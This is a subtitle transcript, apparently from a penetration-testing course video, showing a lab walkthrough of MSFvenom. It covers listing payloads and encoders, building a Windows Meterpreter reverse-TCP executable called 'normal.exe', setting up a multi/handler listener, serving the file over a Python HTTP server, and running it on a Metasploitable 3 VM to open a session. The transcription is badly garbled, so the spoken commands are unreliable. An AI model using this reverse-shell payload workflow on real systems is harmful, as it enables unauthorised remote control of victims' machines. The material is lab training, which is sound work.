1
00:00:00,730 --> 00:00:10,270
So prior to MSF venom, there were MSF payload and MSF and Khoder that would help us to compose more

2
00:00:10,270 --> 00:00:11,260
stealthy payload.

3
00:00:12,540 --> 00:00:18,650
Now, I want to start it like a like a fairy tale or a story, but it wasn't really that far back.

4
00:00:20,120 --> 00:00:29,420
The way I remember it, it was 2015 when MSF venom replaced both MSF payload and MSF uncowed.

5
00:00:31,040 --> 00:00:32,750
Now, I really like this tool.

6
00:00:33,730 --> 00:00:35,920
As it's defined in its description.

7
00:00:37,100 --> 00:00:45,920
A Metis boy standalone payload generator, so I think the guys from the Metters Floyd team deserve applause

8
00:00:45,920 --> 00:00:47,030
for this brilliant tool.

9
00:00:48,450 --> 00:00:52,420
At first glance, you might think it's a simple tool.

10
00:00:52,440 --> 00:00:53,100
What can I do?

11
00:00:54,160 --> 00:01:00,160
And yes, the power is derived from its simplicity and ease of use.

12
00:01:01,850 --> 00:01:07,370
However, it is very comprehensive when you examine its payloads and coders and other capabilities.

13
00:01:08,470 --> 00:01:10,390
So let's have a look at how to use this tool.

14
00:01:12,480 --> 00:01:13,830
Open up a terminal tab.

15
00:01:15,240 --> 00:01:20,700
And simply type MSF venom help to discover the two.

16
00:01:22,140 --> 00:01:26,160
The help screen is pretty well defined and the parameters are well explained.

17
00:01:26,580 --> 00:01:29,490
So make sure that you become well acquainted with it.

18
00:01:30,530 --> 00:01:33,600
Now, you can define many properties for your payloads.

19
00:01:34,550 --> 00:01:40,700
You can add novelette, avoid bad charge, even add custom codes to your payloads.

20
00:01:41,660 --> 00:01:48,920
Also, MSF venom allows you to encode the payload and even lets you use an executable template to be

21
00:01:48,920 --> 00:01:53,780
stealthier, MSF Venom supports all medicine Boit payload.

22
00:01:56,050 --> 00:02:01,540
So to list the available payloads type MSRA venom, well, payload.

23
00:02:04,270 --> 00:02:08,890
The list encoders just type in MSM Venom El Encoders.

24
00:02:10,170 --> 00:02:13,650
And you can do this for any of the architecture supported.

25
00:02:15,760 --> 00:02:16,810
For platforms.

26
00:02:19,840 --> 00:02:21,190
And for format's.

27
00:02:23,660 --> 00:02:28,040
With MSRA venom, you have many ways to create a payload file.

28
00:02:29,120 --> 00:02:33,680
See Python aspects and many other times.

29
00:02:35,260 --> 00:02:40,840
So you can use any payload with almost all options inside MSF venom.

30
00:02:42,170 --> 00:02:47,000
So type MSF venom P in the payload daim.

31
00:02:51,440 --> 00:02:56,120
And to list the options for a payload and list options.

32
00:02:58,300 --> 00:03:02,390
And here we have the description of interpretor reverse TCP payload.

33
00:03:03,490 --> 00:03:10,300
So while creating a payload contained file, you can use all these options to build a more specific

34
00:03:10,300 --> 00:03:10,750
file.

35
00:03:11,990 --> 00:03:14,500
So now let's create a file from the very beginning.

36
00:03:17,050 --> 00:03:26,280
MSF Venom P, then the payload windows execs for Interpretor Reverse TCP.

37
00:03:27,650 --> 00:03:36,830
And payload options almost equals 10, 10 to 11 outpoured equals four four four one.

38
00:03:38,440 --> 00:03:41,140
Platform Windows for Windows Systems.

39
00:03:42,690 --> 00:03:47,940
A 64 for 64 bit architecture's.

40
00:03:49,190 --> 00:03:55,520
F FXE for Windows Executables and finally, O.

41
00:03:56,980 --> 00:03:58,270
For the output file there.

42
00:04:00,490 --> 00:04:02,010
Normal dot exi.

43
00:04:03,680 --> 00:04:11,450
OK, so my executable is now saved in the malware directory and I'll change the directory to desktop

44
00:04:11,840 --> 00:04:12,440
malware.

45
00:04:14,950 --> 00:04:18,460
Well, that's normal, not file resides here.

46
00:04:19,340 --> 00:04:21,440
So file normal Dixy.

47
00:04:22,560 --> 00:04:26,610
And see, there, you can tell that the file is a Windows executable.

48
00:04:27,910 --> 00:04:28,840
So now.

49
00:04:30,330 --> 00:04:34,020
Go to Métis Point and start O'Hanlan.

50
00:04:35,230 --> 00:04:38,470
Use exploit multi handler.

51
00:04:39,970 --> 00:04:41,320
Set payload to.

52
00:04:42,490 --> 00:04:48,160
Windows execs for better reverse DCP.

53
00:04:49,560 --> 00:04:50,460
Said he'll host.

54
00:04:51,910 --> 00:05:02,230
To tend tend to doubt one one said outport two four four four one and show the options again just to

55
00:05:02,230 --> 00:05:02,860
double check.

56
00:05:04,030 --> 00:05:05,520
Right, so everything looks good.

57
00:05:07,600 --> 00:05:09,340
Exploit Jay.

58
00:05:10,660 --> 00:05:14,020
And OK, so the handler started.

59
00:05:15,750 --> 00:05:17,490
So now I'm going to open up a new tab.

60
00:05:18,560 --> 00:05:22,580
And start a Python server from the malware directory.

61
00:05:23,460 --> 00:05:31,080
Python m simple h TTP server on PT. eight thousand.

62
00:05:33,200 --> 00:05:35,450
Then I'm going to open Métis, voidable three.

63
00:05:36,850 --> 00:05:39,610
Start Internet Explorer and go to.

64
00:05:40,910 --> 00:05:48,650
HTP Collins, last large tender tender to the one one call an eight thousand.

65
00:05:50,830 --> 00:05:55,900
So this address will show the files in the malware directory on COLLY.

66
00:05:57,080 --> 00:05:57,560
Now.

67
00:05:58,470 --> 00:06:00,870
Click the normal daddy Yankee to download.

68
00:06:02,350 --> 00:06:03,730
And save it to the desktop.

69
00:06:07,120 --> 00:06:10,300
OK, so let me just open MSF console.

70
00:06:11,970 --> 00:06:16,180
For Métis, portable three run normal daily by double clicking on.

71
00:06:18,250 --> 00:06:20,890
On the left, Bain, you can see the session open.

72
00:06:23,070 --> 00:06:24,630
So type sessions.

73
00:06:25,550 --> 00:06:28,160
And this is it on court for four, for one.

74
00:06:29,800 --> 00:06:33,490
So interact with session one, get UID.

75
00:06:35,590 --> 00:06:35,860
For.

76
00:06:37,680 --> 00:06:45,450
And there you have it, the basic usage of MSRA venom, so you use a payload to generate a vulnerable

77
00:06:45,450 --> 00:06:49,710
file, then you deliver this file to the target.

78
00:06:50,610 --> 00:06:55,770
And then make the target, run this file to connect back to the handler running on our colleague.

79
00:06:57,030 --> 00:07:03,870
So what I'll do is apply this logic in the next few videos as well, so strap on your seatbelt.

80
00:07:05,000 --> 00:07:06,170
We're going to go for a ride.